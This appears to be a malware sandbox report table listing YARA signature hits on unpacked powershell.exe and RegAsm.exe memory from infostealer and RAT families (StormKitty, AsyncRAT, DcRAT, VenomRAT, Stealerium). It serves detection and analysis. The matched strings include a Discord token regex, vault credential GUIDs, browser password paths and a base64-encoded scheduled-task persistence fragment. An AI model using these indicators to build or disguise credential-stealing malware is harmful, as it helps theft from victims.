6.2.powershell.exe.4e51434.5.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty 0x181e7:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x1980f:$s6: "encrypted_key":"(.*?)"
6.2.powershell.exe.4e51434.5.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167e4:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x1b020:$s9: Win32_Process Where ParentProcessID= 0x1ac3d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1acda:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1adef:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1aed7:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.4e4ced4.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.4e4ced4.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.4e4ced4.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x1ece4:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x1ec47:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.4e4ced4.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x1d18d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1d1ff:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1d289:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1d31b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1d385:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1d3f7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1d48d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1d51d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.4e4ced4.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x4b28:$x2: https://github.com/LimerBoy/StormKitty 0x4b44:$x3: StormKitty 0x1c747:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x1dd6f:$s6: "encrypted_key":"(.*?)"
6.2.powershell.exe.4e4ced4.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1ad44:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x1f580:$s9: Win32_Process Where ParentProcessID= 0x1f19d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f23a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f34f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1f437:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.4de0a2c.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.4de0a2c.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.4de0a2c.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x8b18c:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x8b0ef:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.4de0a2c.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x89635:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x896a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x89731:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x897c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x8982d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x8989f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x89935:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x899c5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.4de0a2c.3.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x70fd0:$x2: https://github.com/LimerBoy/StormKitty 0x70fec:$x3: StormKitty 0x88bef:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x8a217:$s6: "encrypted_key":"(.*?)"
6.2.powershell.exe.4de0a2c.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x871ec:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x8ba28:$s9: Win32_Process Where ParentProcessID= 0x8b645:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b6e2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8b7f7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8b8df:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.4e51434.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.4e51434.5.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x18984:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x188e7:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.4e51434.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16e2d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16e9f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16f29:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16fbb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x17025:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x17097:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1712d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x171bd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.4e51434.5.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x149e4:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x19220:$s9: Win32_Process Where ParentProcessID= 0x18e3d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x18eda:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x18fef:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x190d7:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.4c533ce.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.4c533ce.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x2169ea:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x21694d:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.4c533ce.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x214e93:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x214f05:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x214f8f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x215021:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x21508b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x2150fd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x215193:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x215223:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.4c533ce.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1fc82e:$x2: https://github.com/LimerBoy/StormKitty 0x1fc84a:$x3: StormKitty 0x21444d:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x215a75:$s6: "encrypted_key":"(.*?)"
6.2.powershell.exe.4c533ce.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x212a4a:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x217286:$s9: Win32_Process Where ParentProcessID= 0x216ea3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x216f40:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x217055:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x21713d:$cnc4: POST / HTTP/1.1
6.2.powershell.exe.5b4acca.9.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
6.2.powershell.exe.5b4acca.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.powershell.exe.5b4acca.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.5b4acca.9.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
6.2.powershell.exe.5b4acca.9.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
6.2.powershell.exe.5b4acca.9.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d69e:$a1: havecamera 0x1684c8:$a2: timeout 3 > NUL 0x16b84b:$a3: START "" " 0x16bd60:$a3: START "" " 0x16bc3b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcd8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
6.2.powershell.exe.5b4acca.9.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16ebc2:$str01: Processe: 0x16ea7e:$str02: Compname: 0x16eb78:$str04: SandBoxie: 0x16eb0e:$str08: WEBCAMS COUNT: 0x16eb32:$str09: [Virtualization] 0x16f380:$str10: [Open google maps]( 0x170df7:$str11: Remember password: 0x163eea:$str12: Target.Browsers.Firefox 0x14b665:$str13: Modules.Keylogger 0x153528:$str14: ClipperAddresses 0x1556cd:$str15: ChromiumPswPaths 0x1556df:$str15: ChromiumPswPaths 0x151622:$str16: DetectedBankingServices 0x15178b:$str17: DetectCryptocurrencyServices 0x15f684:$str18: CheckRemoteDebuggerPresent 0x160609:$str19: GetConnectedCamerasCount
6.2.powershell.exe.5b4acca.9.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebe8:$str01: set_sUsername 0x13c11a:$str03: set_sExpMonth 0x1514d5:$str04: WritePasswords 0x151f8f:$str05: WriteCookies 0x1556de:$str06: sChromiumPswPaths 0x1556b9:$str07: sGeckoBrowserPaths 0x16ad65:$str10: encrypted_key":"(.*?)"
6.2.powershell.exe.5b4acca.9.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcd8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167da8:$str04: Pac_ket 0x177aee:$str05: Perfor_mance 0x177b32:$str06: Install_ed 0x12219b:$str07: get_IsConnected 0x138660:$str08: get_ActivatePo_ng 0x14c59b:$str09: isVM_by_wim_temper 0x1783e0:$str10: save_Plugin 0x1684c8:$str11: timeout 3 > NUL 0x1776ce:$str12: ProcessHacker.exe 0x1778c0:$str13: Select * from Win32_CacheMemory
6.2.powershell.exe.5b4acca.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcd8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc3b:$s2: L2Mgc2NodGFza3MgL2
6.2.powershell.exe.5b4acca.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x1778c0:$q1: Select * from Win32_CacheMemory 0x177900:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x17794e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x17799c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.5b4acca.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa9c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
6.2.powershell.exe.5b4acca.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175437:$s1: \VPN\NordVPN 0x17541d:$s2: \VPN\OpenVPN 0x1753ff:$s3: \VPN\ProtonVPN
6.2.powershell.exe.5b4acca.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a181:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1f3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a27d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a30f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a379:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3eb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a481:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a511:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.powershell.exe.5b4acca.9.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d38:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163eac:$s6: VirtualBox 0x173a2b:$s6: VirtualBox 0x16f448:$s8: Win32_ComputerSystem 0x173991:$s8: Win32_ComputerSystem 0x16c574:$s9: Win32_Process Where ParentProcessID= 0x16c191:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c22e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c343:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c42b:$cnc4: POST / HTTP/1.1
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
11.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241408:$a1: havecamera 0x28c232:$a2: timeout 3 > NUL 0x28f5b5:$a3: START "" " 0x28faca:$a3: START "" " 0x28f9a5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28fa42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
11.2.RegAsm.exe.400000.0.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x29292c:$str01: Processe: 0x2927e8:$str02: Compname: 0x2928e2:$str04: SandBoxie: 0x292878:$str08: WEBCAMS COUNT: 0x29289c:$str09: [Virtualization] 0x2930ea:$str10: [Open google maps]( 0x294b61:$str11: Remember password: 0x287c54:$str12: Target.Browsers.Firefox 0x26f3cf:$str13: Modules.Keylogger 0x277292:$str14: ClipperAddresses 0x279437:$str15: ChromiumPswPaths 0x279449:$str15: ChromiumPswPaths 0x27538c:$str16: DetectedBankingServices 0x2754f5:$str17: DetectCryptocurrencyServices 0x2833ee:$str18: CheckRemoteDebuggerPresent 0x284373:$str19: GetConnectedCamerasCount
11.2.RegAsm.exe.400000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x5db:$sk01: LimerBoy/StormKitty 0x252952:$str01: set_sUsername 0x25fe84:$str03: set_sExpMonth 0x27523f:$str04: WritePasswords 0x275cf9:$str05: WriteCookies 0x279448:$str06: sChromiumPswPaths 0x279423:$str07: sGeckoBrowserPaths 0x28eacf:$str10: encrypted_key":"(.*?)"
11.2.RegAsm.exe.400000.0.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28fa42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x28bb12:$str04: Pac_ket 0x29b858:$str05: Perfor_mance 0x29b89c:$str06: Install_ed 0x245f05:$str07: get_IsConnected 0x25c3ca:$str08: get_ActivatePo_ng 0x270305:$str09: isVM_by_wim_temper 0x29c14a:$str10: save_Plugin 0x28c232:$str11: timeout 3 > NUL 0x29b438:$str12: ProcessHacker.exe 0x29b62a:$str13: Select * from Win32_CacheMemory
11.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28fa42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28f9a5:$s2: L2Mgc2NodGFza3MgL2
11.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29b62a:$q1: Select * from Win32_CacheMemory 0x29b66a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x29b6b8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x29b706:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293806:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
11.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2991a1:$s1: \VPN\NordVPN 0x299187:$s2: \VPN\OpenVPN 0x299169:$s3: \VPN\ProtonVPN
11.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28deeb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28df5d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28dfe7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28e079:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28e0e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28e155:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28e1eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28e27b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty 0x27dff4:$s2: GetAntivirus 0x29405a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28d4a5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28eacd:$s6: "encrypted_key":"(.*?)"
11.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28baa2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287c16:$s6: VirtualBox 0x297795:$s6: VirtualBox 0x2931b2:$s8: Win32_ComputerSystem 0x2976fb:$s8: Win32_ComputerSystem 0x2902de:$s9: Win32_Process Where ParentProcessID= 0x28fefb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28ff98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2900ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290195:$cnc4: POST / HTTP/1.1
11.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
11.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
11.2.RegAsm.exe.525b8a.1.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
11.2.RegAsm.exe.525b8a.1.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d67e:$a1: havecamera 0x1684a8:$a2: timeout 3 > NUL 0x16b82b:$a3: START "" " 0x16bd40:$a3: START "" " 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
11.2.RegAsm.exe.525b8a.1.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16eba2:$str01: Processe: 0x16ea5e:$str02: Compname: 0x16eb58:$str04: SandBoxie: 0x16eaee:$str08: WEBCAMS COUNT: 0x16eb12:$str09: [Virtualization] 0x16f360:$str10: [Open google maps]( 0x170dd7:$str11: Remember password: 0x163eca:$str12: Target.Browsers.Firefox 0x14b645:$str13: Modules.Keylogger 0x153508:$str14: ClipperAddresses 0x1556ad:$str15: ChromiumPswPaths 0x1556bf:$str15: ChromiumPswPaths 0x151602:$str16: DetectedBankingServices 0x15176b:$str17: DetectCryptocurrencyServices 0x15f664:$str18: CheckRemoteDebuggerPresent 0x1605e9:$str19: GetConnectedCamerasCount
11.2.RegAsm.exe.525b8a.1.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebc8:$str01: set_sUsername 0x13c0fa:$str03: set_sExpMonth 0x1514b5:$str04: WritePasswords 0x151f6f:$str05: WriteCookies 0x1556be:$str06: sChromiumPswPaths 0x155699:$str07: sGeckoBrowserPaths 0x16ad45:$str10: encrypted_key":"(.*?)"
11.2.RegAsm.exe.525b8a.1.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcb8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167d88:$str04: Pac_ket 0x177ace:$str05: Perfor_mance 0x177b12:$str06: Install_ed 0x12217b:$str07: get_IsConnected 0x138640:$str08: get_ActivatePo_ng 0x14c57b:$str09: isVM_by_wim_temper 0x1783c0:$str10: save_Plugin 0x1684a8:$str11: timeout 3 > NUL 0x1776ae:$str12: ProcessHacker.exe 0x1778a0:$str13: Select * from Win32_CacheMemory
11.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcb8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc1b:$s2: L2Mgc2NodGFza3MgL2
11.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x1778a0:$q1: Select * from Win32_CacheMemory 0x1778e0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x17792e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x17797c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa7c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
11.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175417:$s1: \VPN\NordVPN 0x1753fd:$s2: \VPN\OpenVPN 0x1753df:$s3: \VPN\ProtonVPN
11.2.RegAsm.exe.525b8a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a161:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a25d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a2ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a359:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a461:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a4f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
